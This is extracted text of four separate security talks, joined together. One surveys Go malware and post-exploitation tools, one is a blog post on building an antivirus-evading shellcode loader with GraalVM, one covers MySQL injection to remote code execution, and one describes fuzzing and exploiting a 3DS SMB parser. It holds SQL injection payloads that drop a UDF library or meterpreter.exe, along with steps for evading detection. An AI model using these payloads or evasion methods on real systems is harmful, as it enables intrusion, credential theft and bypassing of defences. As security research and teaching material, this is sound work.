Implants act as routers for other
implants. They find each other, only
one needs a way out
Demo also in the Workshop Source code
Use Case: Pivot out of an egress-proxied
datacenter using DNS or S3
Misc Tunnels & Proxies
Chashell - Reverse shell over DNS
Chisel - TCP/UDP tunnel over HTTP
(These two made the news recently…)
Gost - HTTP/Socks5 tunnel
Holeysocks - Reverse Socks via SSH
Wireguard - Distributed VPN
pandorasbox
Encrypted in-memory virtual filesystem
Transparent integration with Golang file
abstraction
Encryption and ~secure enclave provided
by MemGuard
github.com/capnspacehook/pandorasbox
Universal Loader
●
Reflective DLL Loading in Golang on all Platforms
(including the Apple M1!)
●
Replicates the behavior of the system loader when
loading a shared library into a process
●
Load a shared library into the current process
and call functions in it, with the same app
interface on all platforms!
●
Library can be loaded from memory, without ever
touching disk!
github.com/Binject/universal
Universal Loader
●
Windows Method avoids system loader
●
Walks PEB (Go ASM), import_address_table
branch does IAT fixups
●
OSX Method uses dyld (thanks MalwareUnicorn!)
●
Linux Method avoids system loader and does
not use memfd!
●
Heavy use of Binject/debug to parse current
process and library + cppgo to make the calls
Universal Loader
No system loader means other libraries will
not be loaded automatically for you!
Window IAT branch:
syscall.MustLoadDLL(“kernel32.dll")
everything you need ahead of time,
dependencies will be resolved by PEB +
Binject/debug
For Linux, statically compile the libs you
need to load this way and avoid library
dependencies altogether!
Donut
Donut payload creation framework:
A utility that converts EXE, DLL, .NET
assembly, or JScript/VBS to an
encrypted injectable shellcode
An asm loader that decrypts and loads a
donut payload into a process
Supports remote loads, local/remote
processes, and a ton of other stuff!
github.com/TheWover/donut
go-donut
Ported the donut utility to Go using
Binject/debug, re-used the loader
This lets your Golang-based c2’s
generate donut payloads from code and
from Linux/OSX.
Can also use it in your implants…
github.com/Binject/go-donut
Universal vs Donut
For an implant module system that never
touches disk, you may be better off using
Donut and injecting into new/separate
processes (or yourself) rather than
Universal
Especially if you want to run complex
modules like mimikatz (COM host must be on
main thread) or other Go programs.
Scarecrow
Another payload creation framework:
Signs payloads using limelighter
Disables ETW by unhooking itself
AES encryption
Many other stealth features!
github.com/optiv/ScareCrow
bananaphone
Implements Hell’s Gate for Golang, using
the exact same interface as the built-in
syscall library
Modified version of mkwinsyscall
generates Go stubs from headers
Uses Go ASM and Binject/debug
Code using syscall can be easily
converted! There is no reason not to use
this, it’s amazing and easy
github.com/C-Sto/BananaPhone
bananaphone
Bananaphone also has a unique
improvement over traditional Hell’s
Gate:
The “auto mode” will detect when NTDLL
has been hooked by EDR and automatically
switch to loading NTDLL from disk
instead of the hooked in-memory version!
gopherheaven
Implements Heaven’s Gate for Golang
Allows calling 64-bit code from 32-bit
as a method of EDR evasion
Also uses Binject/debug :)
Some sweet i386 Go ASM
github.com/aus/gopherheaven
Agenda
Binject Origin & Why Golang is cool
Malware Core Components
Exploitation Tools
EDR & NIDS Evasion Tools
Post-exploitation Tools
Complete C2 Frameworks
go-mimikatz
Combines go-donut and bananaphone
… which both use Binject/debug
Downloads mimikatz to RAM, makes it into
a donut payload, and injects it into
itself with bananaphoned system calls!
Lets you just run mimikatz on a
surprising number of systems…
Whole program is <150 lines of code!
github.com/vyrus001/go-mimikatz
Demo go-mimikatz
From Linux, go-mimikatz dir:
GOOS=windows GOARCH=amd64 go build
Copied to a SMB share with name “gm.exe”
Did not even use garble…
This is current mimikatz, Win10 Edge,
Defender enabled, running from SMB…
msflib
Make your implants work with Metasploit!
Uses bananaphone
Run a payload in the implant process
Inject a payload into a remote process
github.com/vyrus001/msflib
taskmaster
Windows Task Scheduler library for Go
For persistence, it’s easier to schedule
a task than to create a Windows service
If you really want a Windows service,
here’s an example
github.com/capnspacehook/taskmaster
gscript
Scripting language for droppers in all
three OSes, using embedded JS
Can disable AV, EDR, firewalls, reg
changes, persistence, allll kinds of
stuff (ahhh’s gscript repo)
There’s a whole Defcon26 talk on it!
github.com/gen0cide/gscript
gosecretsdump
Dumps hashes from NTDS.dit files much
faster than impacket
Minutes vs Hours (Go vs Python)
Requires SYSTEM privs to run locally
Also works on backups
github.com/C-Sto/gosecretsdump
goLazagne
Go port of lazagne
Grabs all browser, mail, admin tool
passwords
Requires CGO just because of sqlite
requirement, but… there are purego
alternatives now…
github.com/kerbyj/goLazagne
Misc Post-Exploitation
rclone - dumps data from S3, Dropbox,
GCloud, and other cloud drives
sudophisher - logs the sudo password by
replacing ASKPASS
Agenda
Binject Origin & Why Golang is cool
Malware Core Components
Exploitation Tools
EDR & NIDS Evasion Tools
Post-exploitation Tools
Complete C2 Frameworks
sliver
Open-source
alternative to
Cobalt Strike
Implant build/
config/obfuscate
Multiple
exfiltration
methods
Actively
Developed
github.com/BishopFox/sliver
merlin
Single operator
Many unique features!
Multiple injection methods including
QueueUserAPC
Donut & sRDI integration
QUIC support! (Also many others)
github.com/Ne0nd0g/merlin
Ben Kurtz ([email protected])
@symbolcrash1
https://symbolcrash.com/podcast
Thanks!
Relevant Hack the Planet episodes:
Josh Pitts Interview (YouTube)
C-Sto & capnspacehook Interview (YouTube) | pdf |
利用GraalVM实现免杀加载器
2022-09-16 · 红蓝对抗
起因是与NoOne想围观一下CS47又整了些什么反破解操作,发现 TeamServerImage 套了个GraalVM。贴一段官
网的介绍以及如何看待乎的链接:
如何评价 GraalVM 这个项目?
性能优化就不说了,关键它支持多种主流语言的JIT和Java的AOT,也就是可以编译成不依赖外部JRE的
PE/ELF,大家有没有想起些什么~
精简JRE,打造无依赖的Java-ShellCode-Loader
Mr6师傅通过将精简JRE与JavaShellCodeLoader打包的方式,实现了免杀良好的加载器。GraalVM则是将class
编译为了机器码,一般不用再单独打包且性能更好(Elegant, Very elegant
如何整活
1. 跟着官方文档安装好CE版本 core 和 native-image ,也可以从Oracle下EE版本
2. 准备好需要的编译环境
3. 正常编写java并编译为class
4. 通过 native-image YourClass 编译为PE/ELF
注意上文说了一般,写个Runtime执行命令自然没有问题,但如果用到了反射等动态特性,就得引入它的
agent执行class让它分析一下,生成几个后面 native-image 会用到的配置文件:
Introducing the Tracing Agent: Simplifying GraalVM Native Image Configuration
不过。。。反正我抄出来的JavaShellCodeLoader这样子干它是分析不出的。。。
在没提供额外配置且用到了反射时, native-image 会编译为 fallback image ,需要把class文件和PE/ELF放
一起才可以正常执行。虽然可以用enigmavb打包解决,还是希望会的师傅指点一下我怎么原生编译出来Orz
Get started with GraalVM – is a high-performance JDK designed to accelerate Java application performance
while consuming fewer resources. GraalVM offers two ways to run Java applications: on the HotSpot JVM
with Graal just-in-time (JIT) compiler or as an ahead-of-time (AOT) compiled native executable. Besides
Java, it provides runtimes for JavaScript, Ruby, Python, and a number of other popular languages.
GraalVMʼs polyglot capabilities make it possible to mix programming languages in a single application while
eliminating any foreign language call costs.
1
2
mkdir -p META-INF/native-image
$JAVA_HOME/bin/java -agentlib:native-image-agent=config-output-dir=META-INF/native-image Hell
Bash
另一个问题是在Linux编译时默认会依赖libc,出于兼容考虑应该可以在很老的系统上编译,或者跟着文档准
备好环境,通过 --static --libc=musl 参数静态打包。
我因为一些库本来就有或是通过 pamac 装上了,没完全按步骤走然后报错了,似乎是把 -lz 参数当成文件:
最终效果
VT几乎全过,相信我那一个红的是误报(2333
原生shellcode就能过defender,不过瞎捣鼓还是有几率被杀~ | pdf |
Advanced MySQL Exploitation
Muhaimin Dzulfakar
Defcon 2009 – Las Vegas
1
Who am I
Muhaimin Dzulfakar
Security Consultant
Security-Assessment.com
2
SQL Injection
An attack technique used to exploit web sites that construct SQL
statement from user input
Normally it is used to read, modify and delete database data
In some cases, it is able to perform remote code execution
3
What is a stacked query ?
Condition where multiple SQL statements are allowed. SQL statements
are separated by semicolon
Stack query commonly used to write a file onto the machine while
conducting SQL Injection attack
Blackhat Amsterdam 2009, Bernando Damele demonstrated remote code
execution performed through SQL injection on platforms with stacked
query
Today I will demonstrate how to conduct remote code execution through
SQL injection without stacked query
MySQL-PHP are widely use but stacked query is not allowed by default to
security reason
4
Abusing stacked queries on MySQL
query.aspx?id=21; create table temp(a blob); insert into temp
values (‘0x789c……414141’)--
query.aspx?id=21; update temp set a = replace (a, ‘414141’,
query.aspx?id=21; update temp set a = replace (a, ‘414141’,
9775…..71’)--
query.aspx?id=21; select a from temp into dumpfile
‘/var/lib/mysql/lib/udf.so’--
query.aspx?id=21; create function sys_exec RETURNS int
SONAME 'udf.so‘--
5
Stacked query table
ASP.NET
ASP
PHP
MySQL
Supported
Not supported
Not Supported
MySQL
Supported
Not supported
Not Supported
MSSQL
Supported
Supported
Supported
Postgresql
Supported
Supported
Supported
6
Remote code execution on MySQL-PHP
Traditionally, simple PHP shell is used to execute command
Command is executed as a web server user only
Weak and has no strong functionality
We need a reliable shell!
Metasploit contains variety of shellcodes
Meterpreter shellcode for post exploitation process
VNC shellcode for GUI access on the host
7
File read/write access on MySQL-PHP platform
SELECT .. LOAD_INFILE is used to read file
SELECT .. INTO OUTFILE/DUMPFILE is used to write file
Remote code execution technique on MySQL-PHP
platform
platform
Upload the compressed arbitrary file onto the web server
directory
Upload the PHP scripts onto the web server directory
Execute the PHP Gzuncompress function to decompress the
arbitrary file
Execute the arbitrary file through the PHP System function
8
Challenge on writing arbitrary through UNION SELECT
GET request is limited to 8190 bytes on Apache
May be smaller when Web Application firewall in use
Data from the first query query can overwrite the file header
Data from extra columns can add extra unnecesary data into our
Data from extra columns can add extra unnecesary data into our
arbitrary data. This can potentially corrupt our file
9
Fixing the URL length issue
PHP Zlib module can be used to compress the arbitrary file
9625 bytes of executable can be compressed to 630 bytes
which is able to bypass the max limit request
Decompress the file on the destination before the arbitrary file is
executed
executed
10
Removal of unnecessary data
UNION SELECT will combine the result from the first query with
the second query
query.php?id=21 UNION SELECT 0x34….3234,null,null--
Result from the first query can overwrite the file header
Non existing data can be injected in the WHERE clause
11
First Query
Second Query
Result from first query data + executable code
12
First Query
Executable code
Fixing the columns issue
In UNION SELECT, the second query required the same amount
of columns as the first query
Compressed arbitrary data should be injected in the first column
to prevent data corruption
Zlib uses Adler32 checksum and this value is added at the end of
Zlib uses Adler32 checksum and this value is added at the end of
our compressed arbitrary data
Any injected data after the Adler32 checksum will be ignored
during the decompression process
13
query.php?id=44444 UNION SELECT 0x0a0e13…4314324,0x00,0x00,
into outfile ‘/var/www/upload/meterpreter.exe’
Random data after the Adler32 checksum
14
Adler32 Checksum
Remote code execution on LAMP (Linux, Apache,
MySQL, PHP)
By default, any directory created in Linux is not writable by
mysql /web server users
When the mysql user has the ability to upload a file onto the
web server directory, this directory can be used to upload our
web server directory, this directory can be used to upload our
arbitrary file
By default, uploaded file on the web server through INTO
DUMPFILE is not executable but readable. This file is owned by a
mysql user
Read the file content as a web server user and write it back onto
the web server directory
Chmod the file to be executable and execute using the PHP
system function
15
Remote code execution on WAMP (Windows,
Apache, MySQL, PHP)
By default, MySQL runs as a Local System user
By default, this user has the ability to write into any directory
including the web server directory
Any new file created by this user is executable
PHP system function can be used to execute this file
16
MySqloit
MySqloit is a MySQL injection takeover tool
Features
SQL Injection detection – Detect SQL injection through deep
blind injection method
blind injection method
Fingerprint Dir – Fingerprint the web server directory
Fingerprint OS – Fingerprint the Operating System
Payload – Create a shellcode using Metasploit
Exploit – Upload the shellcode and execute it
17
Demo
\||/
| @___oo
/\ /\
/ (__,,,,|
) /^\) ^\/ _)
) /^\/ _)
) /^\/ _)
) _ / / _) MySqloit
/\ )/\/ || | )_)
< > |(,,) )__)
|| / \)___)\
| \____( )___) )___
\______(_______;;; __;;;
18
\||/
| @___oo
/\ /\
/ (__,,,,|
) /^\) ^\/ _)
) /^\/ _)
) /^\/ _)
) _ / / _) Questions ?
/\ )/\/ || | )_)
< > |(,,) )__)
|| / \)___)\
| \____( )___) )___
\______(_______;;; __;;;
19
\||/
| @___oo
/\ /\
/ (__,,,,|
) /^\) ^\/ _)
) /^\/ _)
) /^\/ _)
) _ / / _) Thank You
/\ )/\/ || | )_)
< > |(,,) )__) [email protected]
|| / \)___)\
| \____( )___) )___
\______(_______;;; __;;;
20 | pdf |
Jailbreaking the 3DS
@smealum(
Intro to 3DS
”Old”(3DS(line
What’s a 3DS?
New(3DS(line
3DS(XL
2DS
New(3DS(XL
3DS
New(2DS(XL
New(3DS
• Out(starting(2014(
• CPU:(4x(ARM11(MPCore((804MHz)(
• GPU:(DMP(PICA(
• RAM:(256MB(FCRAM,(6MB(VRAM(
• IO/Security(CPU:(ARM946(
• Hardware-based(backwards(
compatible(with(DS(games(
• Fully(custom(microkernel-based(OS(
• Out(starting(2011(
• CPU:(2x(ARM11(MPCore((268MHz)(
• GPU:(DMP(PICA(
• RAM:(128MB(FCRAM,(6MB(VRAM(
• IO/Security(CPU:(ARM946(
• Hardware-based(backwards(
compatible(with(DS(games(
• Fully(custom(microkernel-based(OS(
Memory
CPUs
Devices
ARM9(
ARM11(
FCRAM(
WRAM(
VRAM(
ARM9(
internal(
GPU(
CRYPTO(
NAND(
3DS hardware overview
Runs(games,(apps,(menus(–(everything(you(can(see(and(play(with(
Brokers(access(to(storage,(performs(crypto(tasks((decryption,(authentication)(
Memory
CPUs
Devices
ARM9(
ARM11(
FCRAM(
WRAM(
VRAM(
ARM9(
internal(
GPU(
CRYPTO(
NAND(
ARM9: access to almost everything
Memory
CPUs
Devices
ARM9(
ARM11(
FCRAM(
WRAM(
VRAM(
ARM9(
internal(
GPU(
CRYPTO(
NAND(
ARM11: more limited access to hardware
ARM11 Kernel
Home Menu
NS
fs
GSP
HID
System calls
APPLICATION memory region
SYSTEM memory region
BASE memory region
Game
The ARM11’s microkernel architecture
ARM11 Kernel
Home Menu
NS
fs
GSP
HID
System calls
APPLICATION memory region
SYSTEM memory region
BASE memory region
Game
The ARM11’s microkernel architecture: system call access control
ARM11 Kernel
Home Menu
NS
fs
GSP
HID
System calls
APPLICATION memory region
SYSTEM memory region
BASE memory region
Game
The ARM11’s microkernel architecture: system call access control
ARM11 Kernel
Home Menu
NS
fs
GSP
HID
System calls
APPLICATION memory region
SYSTEM memory region
BASE memory region
Game
The ARM11’s microkernel architecture: system call access control
ARM11 Kernel
Home Menu
NS
fs
GSP
HID
System calls
APPLICATION memory region
SYSTEM memory region
BASE memory region
Game
The ARM11’s microkernel architecture: services
gsp::Gpu(
fs:USER(
hid:USER(
fs:USER(
gsp::Gpu(
hid:USER(
ARM11 Kernel
Home Menu
AM
fs
GSP
HID
System calls
APPLICATION memory region
SYSTEM memory region
BASE memory region
Game
The ARM11’s microkernel architecture: service access control
am:sys(
fs:USER(
hid:USER(
am:sys(
gsp::Gpu(
hid:USER(
gsp::Gpu(
am:sys(
fs:USER(
hid:USER(
gsp::Gpu(
fs:USER(
ARM11 Kernel
Home Menu
AM
pxi
GSP
HID
System calls
APPLICATION memory region
SYSTEM memory region
BASE memory region
Game
The ARM11’s microkernel architecture: service access control
am:sys(
fs:USER(
hid:USER(
am:sys(
gsp::Gpu(
hid:USER(
gsp::Gpu(
fs:USER(
hid:USER(
gsp::Gpu(
pxi:am9(
pxi:am9(
ARM9 land
Memory
CPUs
Devices
ARM9(
ARM11(
GPU(
CRYPTO(
NAND(
Physical memory region separation
APPLICATION( SYSTEM( BASE(
FCRAM(
K/P9(
Kernel11(
WRAM(
VRAM(
ARM9(
internal(
Anatomy of a 3DS “jailbreak”
1. Compromise(a(user-mode(game(or(app(
2. Escalate(privilege(to(expand(attack(surface(
3. Compromise(ARM11(kernel(
4. Compromise(ARM9(
Getting code execution
Where do we start?
Previous 3DS entrypoints
Cubic Ninja
• Vulnerable(custom(level(parser(
• Levels(shareable(over(QR(codes…(
• No(ASLR,(no(stack(cookies(etc.(makes(file(format(
bugs(fair(game(
(
Web Browsers
• 3DS(has(a(built-in(browser(
• ASLR,(stack(cookies(etc.(have(never(stopped(a(
browser(exploit(
• Nintendo’s(threat(model(should(assume(
compromised(user-mode(
(
mcopy
SMBv1(protocol(
def$_sendSMBMessage_SMB1(self,$smb_message):$
$$$$...$
$$$$$$$$input$=$smb_message.encode()$
$$$$$$$$output$=$[]$
$
$$$$$$$$#$TMP$FUZZ$TEST$
$$$$$$$$for$i$in$range(len(input)):$
$$$$$$$$$$$$val$=$input[i]$
$$$$$$$$$$$$if$randint(1,$1000)$<$FUZZ_thresh:$
$$$$$$$$$$$$$$$$mask$=$(1$<<$randint(0,$7))$
$$$$$$$$$$$$$$$$val$^=$mask$
$$$$$$$$$$$$output$+=$[val]$
$$$$$$$$#$END$TMP$FUZZ$TEST$
$
$$$$$$$$smb_message.raw_data$=$bytes(output)$
$$$$...$
$$$$self.sendNMBMessage(smb_message.raw_data)$
The worst SMB fuzzer ever written
• Bug(finding(strategy:(fuzzing(
• Used(github.com/miketeo/pysmb(
• Had(to(adjust(some(code(to(make(
it(compatible(with(mcopy(
• Added(6(lines(of(fuzzing(code…(
Attacking mcopy
Insert(fuzz(crash(video(here((~30s(or(less)(
Initial fuzz crash: Wireshark trace
“Fuzzer”(
3DS(
Negotiate(protocol(request(
NTLMSSP_NEGOTIATE(request(
Negotiate(protocol(response(
NTLMSSP_AUTH(request(
NTLMSSP_CHALLENGE(response(
Initial fuzz crash: protocol diagram
00000000"
00000008"
00000010"
00000018"
00000020"
00000028"
00000030"
00000038"
00000040"
00000048"
00000050"
00000058"
00000060"
00000068"
00000070"
00000078"
00000080"
00000088"
00000090"
00000098"
000000A0"
000000A8"
000000B0"
000000B8"
000000C0"
000000C8"
000000D0"
000000D8"
000000E0"
000000E8"
ÿSMBs...$
..AÈ....$
........$
..ì.¸’..$
.ÿ....A.$
.......¬$
.....T..$
€
±.NTLMSS
P.......
..@.....
..X.....
..š.....
..p.....
..x.....
..Š....
‚ŠàF.Þ–:
‘Â......
........
....¤Øý|
KëDŒÑ.;
%¹¨*f”vs
i¥à.U.s.
e.r.L.O.
C.A.L.H.
O.S.T..‡
lÈI9̉&h
/.ºŠ=EW.
O.R.K.G.
R.O.U.P.
.....$
FF$53$4D$42$73$00$00$00$
00$18$41$C8$00$00$00$00$
00$00$00$00$00$00$00$00$
00$00$EC$0F$B8$92$03$00$
0C$FF$00$00$00$04$41$0A$
00$01$00$00$00$00$00$AC$
00$00$00$00$00$54$00$00$
80$B1$00$4E$54$4C$4D$53$
53$50$00$03$00$00$00$18$
00$18$00$40$00$00$00$18$
00$18$00$58$00$00$00$12$
00$12$00$9A$00$00$00$08$
00$08$00$70$00$00$00$12$
00$12$00$78$00$00$00$10$
00$10$00$8A$00$00$00$15$
82$8A$E0$46$0C$DE$96$3A$
91$C2$18$00$00$00$00$00$
00$00$00$00$00$00$00$00$
00$00$00$16$A4$D8$FD$7C$
4B$EB$44$8C$D1$0C$3B$25$
B9$A8$2A$66$94$76$73$69$
A5$E0$2E$55$00$73$00$65$
00$72$00$4C$00$4F$00$43$
00$41$00$4C$00$48$00$4F$
00$53$00$54$00$17$87$6C$
C8$49$39$CC$89$26$68$2F$
90$BA$8A$3D$45$57$00$4F$
00$52$00$4B$00$47$00$52$
00$4F$00$55$00$50$00$00$
00$00$00$00$00$
0x0000:$SMB(magic(number(
0x0004:$SMB(command((0x73:(Sessions(Setup(AndX)(
$...(
0x002F:$Security(blob(size((0xAC(bytes)(
$...(
0x003B:$Security(blob(magic(number(
$...(
0x005F:$Username(data(descriptor(
$$0x00:$Data(length((0x08)(
$$0x02:$Maximum(data(length((0x08)(
$$0x04:$Data(offset((0x00000070)(
$...(
0x00AB:$Username(data((“User”)(
Initial fuzz crash: normal packet
00000000"
00000008"
00000010"
00000018"
00000020"
00000028"
00000030"
00000038"
00000040"
00000048"
00000050"
00000058"
00000060"
00000068"
00000070"
00000078"
00000080"
00000088"
00000090"
00000098"
000000A0"
000000A8"
000000B0"
000000B8"
000000C0"
000000C8"
000000D0"
000000D8"
000000E0"
000000E8"
ÿSMBs...$
..AÈ....$
........$
..ì.¸’..$
.ÿ....A.$
.......¬$
.....T..$
€
±.NTLMSS
P.......
..@.....
..X.....
..š.....
..p.....
..x.....
..Š....
‚ŠàF.Þ–:
‘Â......
........
....¤Øý|
KëDŒÑ.;
%¹¨*f”vs
i¥à.U.s.
e.r.L.O.
C.A.L.H.
O.S.T..‡
lÈI9̉&h
/.ºŠ=EW.
O.R.K.G.
R.O.U.P.
.....$
FF$53$4D$42$73$00$00$00$
00$18$41$C8$00$00$00$00$
00$00$00$00$00$00$00$00$
00$00$EC$0F$B8$92$03$00$
0C$FF$00$00$00$04$41$0A$
00$01$00$00$00$00$00$AC$
00$00$00$00$00$54$00$00$
80$B1$00$4E$54$4C$4D$53$
53$50$00$03$00$00$00$18$
00$18$00$40$00$00$00$18$
00$18$00$58$00$00$00$12$
00$12$00$9A$00$00$00$08$
00$08$00$70$00$00$08$12$
00$12$00$78$00$00$00$10$
00$10$00$8A$00$00$00$15$
82$8A$E0$46$0C$DE$96$3A$
91$C2$18$00$00$00$00$00$
00$00$00$00$00$00$00$00$
00$00$00$16$A4$D8$FD$7C$
4B$EB$44$8C$D1$0C$3B$25$
B9$A8$2A$66$94$76$73$69$
A5$E0$2E$55$00$73$00$65$
00$72$00$4C$00$4F$00$43$
00$41$00$4C$00$48$00$4F$
00$53$00$54$00$17$87$6C$
C8$49$39$CC$89$26$68$2F$
90$BA$8A$3D$45$57$00$4F$
00$52$00$4B$00$47$00$52$
00$4F$00$55$00$50$00$00$
00$00$00$00$00$
0x0000:$SMB(magic(number(
0x0004:$SMB(command((0x73:(Sessions(Setup(AndX)(
$...(
0x002F:$Security(blob(size((0xAC(bytes)(
$...(
0x003B:$Security(blob(magic(number(
$...(
0x005F:$Username(data(descriptor(
$$0x00:$Data(length((0x08)(
$$0x02:$Maximum(data(length((0x08)(
$$0x04:$Data(offset((0x08000070)(
$...(
0x00AB:$Username(data((“User”)(
Initial fuzz crash: corrupted packet
"
Processor:$ARM11$(core$0)$
Exception"type:$data$abort$
Fault"status:$Translation$-$Section$
Current"process:$mcopy$$$$(0004001000024100)$
$
Register"dump:$
$
r0$$$$$$$$$$$$$0885b858$$$$$$$$$$$$r1$$$$$$$$$$$$$1085b724"
r2$$$$$$$$$$$$$ffffffe8$$$$$$$$$$$$r3$$$$$$$$$$$$$00000000$
r4$$$$$$$$$$$$$08002d60$$$$$$$$$$$$r5$$$$$$$$$$$$$00000082$
r6$$$$$$$$$$$$$0885b6b4$$$$$$$$$$$$r7$$$$$$$$$$$$$000000ac$
r8$$$$$$$$$$$$$00000070$$$$$$$$$$$$r9$$$$$$$$$$$$$00000000$
r10$$$$$$$$$$$$00000002$$$$$$$$$$$$r11$$$$$$$$$$$$00000004$
r12$$$$$$$$$$$$80000000$$$$$$$$$$$$sp$$$$$$$$$$$$$08002d28$
lr$$$$$$$$$$$$$00194b44$$$$$$$$$$$$pc$$$$$$$$$$$$$00164e84$
$
cpsr$$$$$$$$$$$80000010$$$$$$$$$$$$dfsr$$$$$$$$$$$00000005$
ifsr$$$$$$$$$$$0000100b$$$$$$$$$$$$far$$$$$$$$$$$$1085b724"
fpexc$$$$$$$$$$00000000$$$$$$$$$$$$fpinst$$$$$$$$$eebc0ac0$
fpinst2$$$$$$$$eebc0ac0$
FAR$$$$$$$$$$$$1085b724$$$$$$$$$$$$Access"type:$Read"
$
Crashing"instruction:$
$ldmmi$r1!,${r3,$r4}$
00000000"
00000008"
00000010"
00000018"
00000020"
00000028"
00000030"
00000038"
00000040"
00000048"
00000050"
00000058"
00000060"
00000068"
00000070"
00000078"
00000080"
00000088"
00000090"
00000098"
000000A0"
000000A8"
000000B0"
000000B8"
000000C0"
000000C8"
000000D0"
000000D8"
000000E0"
000000E8"
ÿSMBs...$
..AÈ....$
........$
..ì.¸’..$
.ÿ....A.$
.......¬$
.....T..$
€
±.NTLMSS
P.......
..@.....
..X.....
..š.....
..p.....
..x.....
..Š....
‚ŠàF.Þ–:
‘Â......
........
....¤Øý|
KëDŒÑ.;
%¹¨*f”vs
i¥à.U.s.
e.r.L.O.
C.A.L.H.
O.S.T..‡
lÈI9̉&h
/.ºŠ=EW.
O.R.K.G.
R.O.U.P.
.....$
FF$53$4D$42$73$00$00$00$
00$18$41$C8$00$00$00$00$
00$00$00$00$00$00$00$00$
00$00$EC$0F$B8$92$03$00$
0C$FF$00$00$00$04$41$0A$
00$01$00$00$00$00$00$AC$
00$00$00$00$00$54$00$00$
80$B1$00$4E$54$4C$4D$53$
53$50$00$03$00$00$00$18$
00$18$00$40$00$00$00$18$
00$18$00$58$00$00$00$12$
00$12$00$9A$00$00$00$08$
00$08$00$70$00$00$08$12$
00$12$00$78$00$00$00$10$
00$10$00$8A$00$00$00$15$
82$8A$E0$46$0C$DE$96$3A$
91$C2$18$00$00$00$00$00$
00$00$00$00$00$00$00$00$
00$00$00$16$A4$D8$FD$7C$
4B$EB$44$8C$D1$0C$3B$25$
B9$A8$2A$66$94$76$73$69$
A5$E0$2E$55$00$73$00$65$
00$72$00$4C$00$4F$00$43$
00$41$00$4C$00$48$00$4F$
00$53$00$54$00$17$87$6C$
C8$49$39$CC$89$26$68$2F$
90$BA$8A$3D$45$57$00$4F$
00$52$00$4B$00$47$00$52$
00$4F$00$55$00$50$00$00$
00$00$00$00$00$
Initial fuzz crash: exception dump
int$SecurityBlob::parse(u8*$buffer,$int$length)$
{$
$$int$result$=$-1;$
$$if$($security_blob_len$>=$0x58$)$
$${$
$$$$int$offset$=$this->unpack_ntlmssp_header(buffer,$length);$
$
$$$$if$($offset$>=$0$)$
$$$${$
$$$$$$for(int$i$=$0;$i$<$6;$i++)$
$$$$$${$
$$$$$$$$offset$+=$this->unpack_length_offset(buffer$+$offset,$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$&this->fields[i]);$
$$$$$$}$
$
$$$$$$offset$+=$this->parse_negociate_flags(buffer$+$offset);$
$
$$$$$$int$username_length$=$this->fields[3].length;$
$$$$$$if$($username_length$&&$username_length$<=$length$-$offset$)$
$$$$$${$
$$$$$$$$this->username_buffer$=$malloc(username_length$&$0xFFFFFFFE);$
$$$$$$$$memmove(this->username_buffer,$
$$$$$$$$$$$$$$$$buffer$+$this->fields[3].offset,$
$$$$$$$$$$$$$$$$username_length);$
$$$$$$$$offset$+=$username_length;$
$$$$$$}$
$
$$$$$$$...$
$
$$$$}$
$$}$
$$return$result;$
}$
$
00000000"
00000008"
00000010"
00000018"
00000020"
00000028"
00000030"
00000038"
00000040"
00000048"
00000050"
00000058"
00000060"
00000068"
00000070"
00000078"
00000080"
00000088"
00000090"
00000098"
000000A0"
000000A8"
000000B0"
000000B8"
000000C0"
000000C8"
000000D0"
000000D8"
000000E0"
000000E8"
ÿSMBs...$
..AÈ....$
........$
..ì.¸’..$
.ÿ....A.$
.......¬$
.....T..$
€
±.NTLMSS
P.......
..@.....
..X.....
..š.....
..p.....
..x.....
..Š....
‚ŠàF.Þ–:
‘Â......
........
....¤Øý|
KëDŒÑ.;
%¹¨*f”vs
i¥à.U.s.
e.r.L.O.
C.A.L.H.
O.S.T..‡
lÈI9̉&h
/.ºŠ=EW.
O.R.K.G.
R.O.U.P.
.....$
FF$53$4D$42$73$00$00$00$
00$18$41$C8$00$00$00$00$
00$00$00$00$00$00$00$00$
00$00$EC$0F$B8$92$03$00$
0C$FF$00$00$00$04$41$0A$
00$01$00$00$00$00$00$AC$
00$00$00$00$00$54$00$00$
80$B1$00$4E$54$4C$4D$53$
53$50$00$03$00$00$00$18$
00$18$00$40$00$00$00-18$
00$18$00$58$00$00$00-12$
00$12$00$9A$00$00$00-08$
00$08$00$70$00$00$08-12$
00$12$00$78$00$00$00-10$
00$10$00$8A$00$00$00$15$
82$8A$E0$46$0C$DE$96$3A$
91$C2$18$00$00$00$00$00$
00$00$00$00$00$00$00$00$
00$00$00$16$A4$D8$FD$7C$
4B$EB$44$8C$D1$0C$3B$25$
B9$A8$2A$66$94$76$73$69$
A5$E0$2E$55$00$73$00$65$
00$72$00$4C$00$4F$00$43$
00$41$00$4C$00$48$00$4F$
00$53$00$54$00$17$87$6C$
C8$49$39$CC$89$26$68$2F$
90$BA$8A$3D$45$57$00$4F$
00$52$00$4B$00$47$00$52$
00$4F$00$55$00$50$00$00$
00$00$00$00$00$
Initial fuzz crash: code
int$SecurityBlob::parse(u8*$buffer,$int$length)$
{$
$$...$
$$for(int$i$=$0;$i$<$6;$i++)$
$${$
$$$$offset$+=$this->unpack_length_offset(buffer$+$offset,$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$&this->field[i]);$
$$}$
$$...$
}$
$
int$sub_1910C4()$
{$
$$...$
$$secblob->parse(buffer,$length);$
$
$$if(secblob->fields[1].length$!=$0x18)$
$$$$secblob->sub_18EA84(0x18,$...);$
$$else$
$$$$secblob->sub_18EBB0(secblob->fields[1].length,$...);$
$$...$
}$
int$SecurityBlob::sub_18EBB0(...)$
{$
$$wchar_t$local_buffer[0x20];$
$
$$...$
$
$$memmove(local_buffer,$this->domain_buffer,$this->domain_length);$
$
$$...$
}$
Exploitable vuln: code
00000000"
00000008"
00000010"
00000018"
00000020"
00000028"
00000030"
00000038"
00000040"
00000048"
00000050"
00000058"
00000060"
00000068"
00000070"
00000078"
00000080"
00000088"
00000090"
00000098"
000000A0"
000000A8"
000000B0"
000000B8"
000000C0"
000000C8"
000000D0"
000000D8"
000000E0"
000000E8"
""..."
ÿSMBs...$
..AÈ....$
........$
..ì.¸’..$
.ÿ....A.$
.......¬$
.....T..$
€
±.NTLMSS
P.......
..@.....
..X.....
..š.....
..p.....
..x.....
..Š....
‚ŠàF.Þ–:
‘Â......
........
....¤Øý|
KëDŒÑ.;
%¹¨*f”vs
i¥à.U.s.
e.r.L.O.
C.A.L.H.
O.S.T..‡
lÈI9̉&h
/.ºŠ=EW.
O.R.K.G.
R.O.U.P.
........$
FF$53$4D$42$73$00$00$00$
00$18$41$C8$00$00$00$00$
